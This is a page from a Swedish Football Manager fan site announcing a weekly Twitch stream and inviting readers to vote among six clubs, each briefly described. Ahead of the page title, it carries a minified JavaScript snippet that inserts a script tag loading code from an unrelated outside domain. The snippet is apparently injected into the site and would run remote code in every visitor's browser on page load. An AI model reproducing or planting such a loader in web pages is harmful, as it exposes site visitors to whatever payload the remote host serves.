;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vi blir med streamkanal! – FMSweden
Meny Stäng

Vi blir med streamkanal!

Nu är det dags att kicka igång fotbollsäsongen 2020/2021 och vad passar då bättre än att också streama lite Football Manager? Undertecknad tar Er gärna med på en resa där vi gemensamt försöker nå framgång på söndag-kvällarna framöver. Kontot vi kommer sända från är twitch.tv/fms_live och preliminär tid är söndagar klockan 17.30-20.30 med start söndagen den 13e September. Men för att sätta bollen i rullning redan nu har mina crewkollegor tagit fram ett varsitt lagförslag så att Ni, sidans användare, kan bestämma vilket lag vi ska spela med. Det laget som får flest röster fram till och med söndagen den 13e September klockan 15.00 blir också det laget vi spelar med. Så läs på lite om lagen och lägg sedan din röst så ses vi live på Internet om en vecka!

Auxerre
* Har riktigt fina faciliteter och fått upp en rad spelare som startat sin seniorkarriär här. Spelare som Philippe Mexès och Djibril Cissé var riktigt fina på CM 01/02 och före det så seniordebuterade en viss Eric Cantona här. Håller numera till i franska Ligue 2 men har helt klart potential för att ta sig upp till Ligue 1 hyfsat snabbt.

Bolton
* Faktiskt det första laget som jag såg på plats i England (år 2006). Visserligen hade Tottenham hemmaplan (fina White Hart Lane) och var också riktigt bra. Men vilket innermittfält Bolton hade med Iván Campo och Jay-Jay Okocha! Man låg då femma i Premier League. Kan jag lyfta dom till samma nivå igen?

Fiorentina
* Med sönerna till Chiesa och Simeone som hade växt in i kostymen hade i alla fall jag räknat med mer från Fiorentina i fjol. En 10e plats med den truppen kändes inte riktigt okej. Nu har visserligen Simeone lämnat laget men man har fått tillbaka Amrabat som var fullständigt lysande i Hellas Verona förra säsongen samt tagit in backen Pol Lirola bland annat. Jag tror helt klart det finns en Europaplats att nå med Fiorentina.

Portsmouth
* Var i Premier League 2003-2010 med fina spelare som Nwankwo Kanu, Benjani och Niko Kranjčar, men sedan kraschade man – hårt. Klubben gick in i administration på grund av bristfällig ekonomi och sjunk till League Two. Nu har man skuggat topplagen i League One i tre säsonger, är det dags att ta klivet till Championship och i slutändan överträffa 8e platsen i Premier League från säsongen 07/08?

Sunderland
* Tro mig eller ej men Sunderland var tillsammans med Celtic det första laget jag spelade med någonsin i CM/FM-serien. På grund av tipsextra hade man fått intresse för anfallaren Niall Quinn som i CM 97/98 höll till i Sunderland tillsammans med Kevin Phillips på topp. Många här har nog annars stenkoll på Sunderland efter dokumentären som sänts på Netflix.

Vitória Guimarães
* Visste du att Vitória de Guimarães är femma i den portugisiska marathontabellen? Kanske hade man kunnat gissa sig till det då man har hört om laget men vad gör väl det när man aldrig vunnit ligan. Dom tre stora klubbarna har fullständig dominans med 84 av 86 ligatitlar och dom enda två som stuckit emellan är Belenenses (Lissabon) och Boavista (Porto). Visst är det dags att låta den portugisiska ligabucklan för första gången hamna utanför Lissabon eller Porto? Och då finns det inget lag som förtjänar det mer än Vitória Guimarães.

Röstar gör ni i tråden på forumet här: Omröstning för vilket lag som ska streamas

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar